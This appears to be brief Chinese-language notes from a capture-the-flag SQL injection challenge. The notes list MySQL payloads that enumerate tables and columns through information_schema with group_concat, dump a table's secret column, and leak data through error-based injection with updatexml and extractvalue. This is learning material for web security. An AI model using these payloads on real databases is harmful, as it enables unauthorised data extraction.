0x00 AA
group_concat();
将查询结果合并成一个字符串;
group_concat(table_name) from information_schema.tables where table_schema='challenges'
eu2ivk78cb
group_concat(column_name) from information_schema.columns where table_name='eu2ivk78cb'
id,sessid,secret_GA8U,tryy
group_concat(id,sessid,secret_GA8U,tryy) from eu2ivk78cb
length();
获取字符串长度;//length(version());
substr(@str,start,len);
提取子字符串,从start开始,截取len个字符,mysql的字符下标是从1开始的;
hex(‘a’);//把字符转化成16进制表示
unhex();//16进制->字符
char(0x61);//16进制->字符
updatexml(1,concat(0x5e,version(),0x5e),1);//报错注入显示
extractvalue(1, concat(0x5c,version(),0x5c));//报错注入显示